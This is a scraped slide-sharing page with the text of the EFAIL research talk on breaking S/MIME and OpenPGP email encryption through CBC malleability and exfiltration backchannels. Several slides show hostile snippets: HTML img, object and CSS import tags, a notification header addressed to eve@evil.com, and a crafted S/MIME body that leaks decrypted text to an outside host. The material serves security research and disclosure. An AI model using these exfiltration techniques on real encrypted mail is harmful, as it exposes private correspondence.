efail
play

EFAIL BREAKING S/MIME AND OPENPGP EMAIL ENCRYPTION USING - PowerPoint PPT Presentation

Jul 12, 2023 •253 likes •675 views

EFAIL BREAKING S/MIME AND OPENPGP EMAIL ENCRYPTION USING EXFILTRATION CHANNELS mail@efail.de | https://www.efail.de 1 Mnster University of Applied Sciences Damian Poddebniak 1 , Christian Dresen 1 , Jens Mller 2 , Fabian Ising 1 , 2 Ruhr

  1. EFAIL BREAKING S/MIME AND OPENPGP EMAIL ENCRYPTION USING EXFILTRATION CHANNELS mail@efail.de | https://www.efail.de 1 Münster University of Applied Sciences Damian Poddebniak 1 , Christian Dresen 1 , Jens Müller 2 , Fabian Ising 1 , 2 Ruhr University Bochum Sebastian Schinzel 1 , Simon Friedberger 3 , Juraj Somorovsky 2 , Jörg Schwenk 2 3 NXP Semiconductors 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 1

  2. Motivation for email encryption Nation state attackers • Massive collection of emails • Snowden revelations on pervasive surveillance Breach of email provider / email account • Single point of failure • Aren’t they reading / analyzing my emails anyway? Insecure transport • TLS might be used – we don’t know in advance! 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 2

  3. Email e2e encryption TWO COMPETING STANDARDS OpenPGP (RFC 4880) • Favored by privacy advocates • Web-of-trust (no authorities) S/MIME (RFC 5751) • Favored by organizations • Multi root trust hierarchies 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 3

  4. Security of email encryption Request/response protocols Email is non-interactive ? 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 4

  5. Backchannel techniques Forcing an email client to send responses via backchannels • HTML/CSS <img src="http://efail.de"> <object data="ftp://efail.de"> • Email header <style>@import '//efail.de'</style> • Attachment preview ... • Certificate verification 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 5

  6. Backchannel techniques Forcing an email client to send responses via backchannels • HTML/CSS Disposition-Notification-To: eve@evil.com Remote-Attachment-URL: http://efail.de • Email header X-Image-URL: http://efail.de • Attachment preview … • Certificate verification 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 6

  7. Backchannel techniques Forcing an email client to send responses via backchannels • HTML/CSS • Email header • Attachment preview PDF, SVG, VCards, etc. • Certificate verification 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 7

  8. Backchannel techniques Forcing an email client to send responses via backchannels • HTML/CSS • Email header • Attachment preview OCSP, CRL, intermediate certs • Certificate verification 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 8

  9. Evaluation of backchannels in email clients Outlook Postbox Live Mail The Bat! eM Client W8Mail Windows IBM Notes Foxmail Pegasus Mulberry WLMail W10Mail KMail Claws Thunderbird Linux Evolution Trojitá Mutt User interaction Airmail MailMate Apple Mail macOS No user interaction Mail App Outlook CanaryMail iOS Leak via bypass K-9 Mail MailDroid Javascript execution Android R2Mail Nine GMail Yahoo! GMX Mail.ru ProtonMail Mailbox Webmail iCloud FastMail Mailfence ZoHo Mail HushMail Outlook.com Horde IMP Roundcube Exchange GroupWise Webapp RainLoop AfterLogic Mailpile 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 9

  10. Evaluation of backchannels in email clients Outlook Postbox Live Mail The Bat! eM Client W8Mail Windows IBM Notes Foxmail Pegasus Mulberry WLMail W10Mail KMail Claws Thunderbird Linux Evolution Trojitá Mutt 40/47 clients have User interaction Airmail MailMate Apple Mail macOS No user interaction backchannels requiring Mail App Outlook CanaryMail iOS Leak via bypass no user interaction K-9 Mail MailDroid Javascript execution Android R2Mail Nine GMail Yahoo! GMX Mail.ru ProtonMail Mailbox Webmail iCloud FastMail Mailfence ZoHo Mail HushMail Outlook.com Horde IMP Roundcube Exchange GroupWise Webapp RainLoop AfterLogic Mailpile 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 10

  11. Attacker model 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 11

  12. Attacker model 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 12

  13. S/MIME 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 13

  14. Malleability of CBC C 1 C 2 C 0 decryption decryption P 1 P 0 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 14

  15. Malleability of CBC C 1 C 2 C 0 0 0 1 0 1 0 1 0 decryption decryption 1 1 1 1 1 1 1 1 P 1 P 0 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 15

  16. Malleability of CBC C 1 C 2 C 0 0 1 1 0 1 0 1 0 decryption decryption 1 1 1 1 1 1 1 1 P 1 P 0 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 16

  17. Malleability of CBC C 1 C 2 C 0 0 1 1 0 1 0 1 0 decryption decryption 1 0 1 1 1 1 1 1 P 1 P 0 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 17

  18. Malleability of CBC C 1 C 2 C 0 0 1 1 1 1 0 1 0 decryption decryption 1 0 1 1 1 1 1 1 P 1 P 0 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 18

  19. Malleability of CBC C 1 C 2 C 0 0 1 1 1 1 0 1 0 decryption decryption 1 0 1 0 1 1 1 1 P 1 P 0 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 19

  20. Malleability of CBC C 1 C 2 C 0 0 1 1 1 1 0 0 0 decryption decryption 1 0 1 0 1 1 1 1 P 1 P 0 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 20

  21. Malleability of CBC C 1 C 2 C 0 0 1 1 1 1 0 0 0 decryption decryption 1 0 1 0 1 1 0 1 P 1 P 0 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 21

  22. Malleability of CBC C 1 C 2 C 0 0 1 1 1 1 0 0 0 ? decryption decryption 1 0 1 0 1 1 0 1 P 1 P 0 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 22

  23. Malleability of CBC C 1 C 2 C 0 decryption decryption Content-type: te xt/html\nDear Bob P 1 P 0 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 23

  24. Malleability of CBC C 1 C 2 C 0 ' decryption decryption Z ontent-type: te xt/html\nDear Bob P 1 P 0 ' 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 24

  25. Malleability of CBC C 1 C 2 C 0 ⊕ P 0 decryption decryption 0000000000000000 xt/html\nDear Bob P 1 P 0 ' CBC Gadget 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 25

  26. Malleability of CBC C 1 C 2 C 0 ⊕ P 0 ⊕ P c decryption decryption <img src=”ev.il/ xt/html\nDear Bob P 1 P 0 ' 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 26

  27. Malleability of CBC C 1 ' C 2 C 0 decryption decryption Content-type: te Z t/html\nDear Bob P 1 ' P 0 ' 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 27

  28. Malleability of CBC C 1 ' C 2 C 0 decryption decryption ???????????????? Z t/html\nDear Bob P 1 ' P 0 ' 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 28

  29. Attacking S/MIME No MAC 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 29

  30. Attacking S/MIME 1 PRACTICAL ATTACK AGAINST S/MIME . 1 / P T T H . . . i w 0 2 Content-type: te xt/html\nDear Sir or Madam, the se % ecret meeting wi g n i t e e m 0 2 Original % t e r c e Crafted s 0 2 % e h t 0 2 ???????????????? <base " ???????????????? " href="http:"> % C 2 % m a d a M ???????????????? <img " ???????????????? " src="efail.de/ 0 2 % r o 0 2 % r Content-type: te xt/html\nDear Sir or Madam, the se ecret meeting wi i S 0 2 % r a e e ???????????????? D "> d . . . l . i / a f T e E G : t s o Reordering Duplicating Changing H 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 30

  31. Practical attack against S/MIME ATTACKER MODEL 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 31

  32. OpenPGP 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 32

More recommend